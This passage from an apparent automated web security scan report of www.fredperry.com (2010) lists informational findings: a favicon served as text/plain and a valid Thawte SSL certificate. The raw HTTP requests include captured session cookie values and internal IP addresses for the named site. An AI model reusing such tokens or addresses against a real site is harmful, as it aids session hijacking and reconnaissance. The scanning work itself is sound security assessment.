The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /skin/frontend/default/default/favicon.ico HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; ARPT=VVNKIYS192.168.100.195CKOLQ; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; __utmb=119066206.1.10.1289339096

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:45:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c6d-47e-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ................................................................................................................PsttxvwwbjjjbkllR^^^B..............................
...[SNIP]...

12.4. https://www.fredperry.com/skin/frontend/default/default/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fredperry.com
Path:   /skin/frontend/default/default/favicon.ico

Issue detail

The response contains the following Content-type statement:

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /skin/frontend/default/default/favicon.ico HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bc8-47e-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/plain

............ .h.......(....... ..... ................................................................................................................PsttxvwwbjjjbkllR^^^B..............................
...[SNIP]...

13. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fredperry.com
Issued by:  Thawte Server CA
Valid from:  Sun Dec 13 18:00:00 CST 2009
Valid to:  Wed Mar 14 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte Server CA
Issued by:  Thawte Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
